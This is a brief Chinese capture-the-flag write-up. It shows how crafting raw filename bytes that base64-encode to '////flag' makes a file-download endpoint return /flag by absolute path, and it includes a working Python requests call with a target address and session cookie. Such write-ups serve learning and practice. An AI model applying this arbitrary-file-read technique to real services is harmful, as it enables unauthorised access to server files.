打开之后首先是注册登录，然后可以进行文件上传。上传文件后，页面上出现文件名，并且可以通过?filename=参数下载回来，注意文件名被进行了base64编码。

提示flag文件位于/flag处，因此构造文件名（ff ff ff 7e 56 a0）使得base64编码后为////flag，这样再下载时，会直接根据绝对路径传回flag文件。网页上不太好直接操作，我这里用的python requests库。上传完成后下载对应文件可得flag。

requests.post('http://82.157.146.43:17972/upload', files={'file':open('test','rb')}, data={'filename': '\xff\xff\xff\x7e\x56\xa0'}, cookies={'session': 'eyJ1aWQiOjF9.ZTp6Nw.kWQIM2nc13hHOf4naTWzopZQRVc'})